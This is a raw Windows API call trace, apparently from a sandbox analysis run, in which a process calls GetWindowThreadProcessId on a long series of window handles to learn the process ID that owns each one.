	[0920.337] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1298
	[0920.337] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x120c
	[0920.337] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x122c
	[0920.337] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x11c4
	[0920.337] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x11b0
	[0920.337] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1188
	[0920.338] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1148
	[0920.338] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1160
	[0920.338] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x10fc
	[0920.338] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xe34
	[0920.338] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xea4
	[0920.338] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x514
	[0920.338] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xe48
	[0920.338] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xbc8
	[0920.339] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xdf8
	[0920.339] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x318
	[0920.339] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xcac
	[0920.339] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x8bc
	[0920.339] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xf9c
	[0920.339] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xf48
	[0920.339] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xe40
	[0920.339] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xecc
	[0920.340] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xeb8
	[0920.340] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xe80
	[0920.340] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xe98
	[0920.340] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xe60
	[0920.340] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xee4
	[0920.340] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xf00
	[0920.340] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xdf0
	[0920.340] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xe1c
	[0920.341] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xdd0
	[0920.341] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xd94
	[0920.341] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xd74
	[0920.341] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xd00
	[0920.341] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xcd8
	[0920.341] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xc84
	[0920.342] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xca4
	[0920.342] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xc64
	[0920.342] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xc24
	[0920.342] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xb84
	[0920.342] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xbac
	[0920.342] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x384
	[0920.342] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xab8
	[0920.342] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x33c
	[0920.343] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xa44
	[0920.343] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xa64
	[0920.343] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x8a8
	[0920.343] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xaf0
	[0920.343] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x88c
	[0920.343] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xb04
	[0920.343] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x910
	[0920.343] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x230
	[0920.344] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xac0
	[0920.344] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xab4
	[0920.344] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xaac
	[0920.344] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x3d0
	[0920.344] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x978
	[0920.344] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xa7c
	[0920.344] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x59c
	[0920.344] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xa88
	[0920.345] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xa6c
	[0920.345] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xa68
	[0920.345] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x9f8
	[0920.345] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xa04
	[0920.345] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x924
	[0920.345] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x8dc
	[0920.345] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x7dc
	[0920.345] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x768
	[0920.345] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x764
	[0920.346] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x820
	[0920.346] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x810
	[0920.346] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x794
	[0920.346] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x83c
	[0920.346] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x7ac
	[0920.346] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xb44
	[0920.346] GetWindowThreadProcessId (in: hWnd=0x108d6, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x6bc
	[0920.346] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xb5c
	[0920.347] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x838
	[0920.347] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x4d0
	[0920.347] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x4d0
	[0920.347] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x4d0
	[0920.347] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x4d0
	[0920.347] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x4d0
	[0920.347] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x4d0
	[0920.347] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x4d0
	[0920.348] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x4d0
	[0920.348] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x818
	[0920.348] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x5b8
	[0920.348] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x494
	[0920.348] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1ec
	[0920.348] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x440
	[0920.348] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x7e8
	[0920.348] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x730
	[0920.349] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x2c8
	[0920.349] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x31c
	[0920.349] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x330
	[0920.349] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x128
	[0920.349] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x5c8
	[0920.349] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x6f8
	[0920.349] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x358
	[0920.349] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x73c
	[0920.350] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xb0
	[0920.350] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x250
	[0920.350] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x240
	[0920.350] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x790
	[0920.350] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x61c
	[0920.350] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x540
	[0920.350] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x538
	[0920.350] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x568
	[0920.351] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x538
	[0920.351] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x568
	[0920.351] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x538
	[0920.351] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x540
	[0920.352] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x540
	[0920.352] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x57c
	[0920.352] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x460
	[0920.352] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x554
	[0920.352] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x4d0
	[0920.352] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x528
	[0920.352] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x4d0
	[0920.352] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x4d0
	[0920.353] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x4d0
	[0920.353] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x79c
	[0920.353] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x4d0
	[0920.353] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x4e0
	[0920.353] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x4d0
	[0920.353] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x460
	[0920.353] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x460
	[0920.353] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x44c
	[0920.354] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x778
	[0920.354] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x460
	[0920.354] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x558
	[0920.354] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x4d0
	[0920.354] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x4d0
	[0920.354] GetWindowThreadProcessId (in: hWnd=0x10bd8, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x25d8
	[0920.354] GetWindowThreadProcessId (in: hWnd=0x10bb8, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x2594
	[0920.354] GetWindowThreadProcessId (in: hWnd=0x10baa, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x2590
	[0920.355] GetWindowThreadProcessId (in: hWnd=0x10b76, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x2530
	[0920.355] GetWindowThreadProcessId (in: hWnd=0x10b68, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x251c
	[0920.355] GetWindowThreadProcessId (in: hWnd=0x10b64, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x2254
	[0920.355] GetWindowThreadProcessId (in: hWnd=0x10b60, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x2250
	[0920.355] GetWindowThreadProcessId (in: hWnd=0x10b54, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x16f0
	[0920.355] GetWindowThreadProcessId (in: hWnd=0x10b48, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1338
	[0920.355] GetWindowThreadProcessId (in: hWnd=0x10b3e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1ca0
	[0920.355] GetWindowThreadProcessId (in: hWnd=0x10b34, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x238c
	[0920.356] GetWindowThreadProcessId (in: hWnd=0x10b2a, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1b08
	[0920.356] GetWindowThreadProcessId (in: hWnd=0x10b0e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1a8c
	[0920.356] GetWindowThreadProcessId (in: hWnd=0x10af8, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x18e0
	[0920.356] GetWindowThreadProcessId (in: hWnd=0x10aec, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x2344
	[0920.356] GetWindowThreadProcessId (in: hWnd=0x10ae0, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1d8c
	[0920.356] GetWindowThreadProcessId (in: hWnd=0x10ad4, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1038
	[0920.356] GetWindowThreadProcessId (in: hWnd=0x10ad0, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1a58
	[0920.357] GetWindowThreadProcessId (in: hWnd=0x10acc, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1c7c
	[0920.357] GetWindowThreadProcessId (in: hWnd=0x10ac6, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1f04
	[0920.357] GetWindowThreadProcessId (in: hWnd=0x10ac2, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x18b8
	[0920.357] GetWindowThreadProcessId (in: hWnd=0x40278, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x22c8
	[0920.357] GetWindowThreadProcessId (in: hWnd=0x10abe, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x21b8
	[0920.357] GetWindowThreadProcessId (in: hWnd=0x20958, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x21c0
	[0920.357] GetWindowThreadProcessId (in: hWnd=0x10a7a, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x219c
	[0920.357] GetWindowThreadProcessId (in: hWnd=0x10a6a, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x20f4
	[0920.358] GetWindowThreadProcessId (in: hWnd=0x10a4c, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x20e4
	[0920.358] GetWindowThreadProcessId (in: hWnd=0x10a40, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x20e8
	[0920.358] GetWindowThreadProcessId (in: hWnd=0x10a36, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x20ec
	[0920.358] GetWindowThreadProcessId (in: hWnd=0x20602, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x20f0
	[0920.358] GetWindowThreadProcessId (in: hWnd=0x10a2e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1e34
	[0920.358] GetWindowThreadProcessId (in: hWnd=0x10a28, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xc38
	[0920.358] GetWindowThreadProcessId (in: hWnd=0x10a20, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1fe4
	[0920.358] GetWindowThreadProcessId (in: hWnd=0x10a10, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1f10
	[0920.359] GetWindowThreadProcessId (in: hWnd=0x10a0c, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1f0c
	[0920.359] GetWindowThreadProcessId (in: hWnd=0x10a08, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1f08
	[0920.359] GetWindowThreadProcessId (in: hWnd=0x109fc, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1ef0
	[0920.359] GetWindowThreadProcessId (in: hWnd=0x109ee, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1eec
	[0920.359] GetWindowThreadProcessId (in: hWnd=0x109e0, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1ee4
	[0920.359] GetWindowThreadProcessId (in: hWnd=0x109c6, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1ed8
	[0920.376] GetWindowThreadProcessId (in: hWnd=0x109b6, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1ed0
	[0920.376] GetWindowThreadProcessId (in: hWnd=0x1099c, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1e8c
	[0920.376] GetWindowThreadProcessId (in: hWnd=0x1098e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1e88
	[0920.376] GetWindowThreadProcessId (in: hWnd=0x1097e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1e84
	[0920.376] GetWindowThreadProcessId (in: hWnd=0x20620, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1604
	[0920.376] GetWindowThreadProcessId (in: hWnd=0x1095a, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1c2c
	[0920.376] GetWindowThreadProcessId (in: hWnd=0x10966, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1c08
	[0920.376] GetWindowThreadProcessId (in: hWnd=0x10964, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1c0c
	[0920.377] GetWindowThreadProcessId (in: hWnd=0x10962, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1c10
	[0920.377] GetWindowThreadProcessId (in: hWnd=0x1095e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1c14
	[0920.377] GetWindowThreadProcessId (in: hWnd=0x2043c, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1c18
	[0920.377] GetWindowThreadProcessId (in: hWnd=0x206a6, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1c1c
	[0920.377] GetWindowThreadProcessId (in: hWnd=0x4092e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x16fc
	[0920.377] GetWindowThreadProcessId (in: hWnd=0x30426, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1e78
	[0920.377] GetWindowThreadProcessId (in: hWnd=0x10956, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1c20
	[0920.378] GetWindowThreadProcessId (in: hWnd=0x503ea, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x191c
	[0920.378] GetWindowThreadProcessId (in: hWnd=0x108c6, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1748
	[0920.378] GetWindowThreadProcessId (in: hWnd=0x2037c, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1bb4
	[0920.378] GetWindowThreadProcessId (in: hWnd=0x204d4, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x10bc
	[0920.378] GetWindowThreadProcessId (in: hWnd=0x20376, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1b50
	[0920.378] GetWindowThreadProcessId (in: hWnd=0x108ba, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x14b4
	[0920.378] GetWindowThreadProcessId (in: hWnd=0x108b4, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x149c
	[0920.378] GetWindowThreadProcessId (in: hWnd=0x108ae, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x14a8
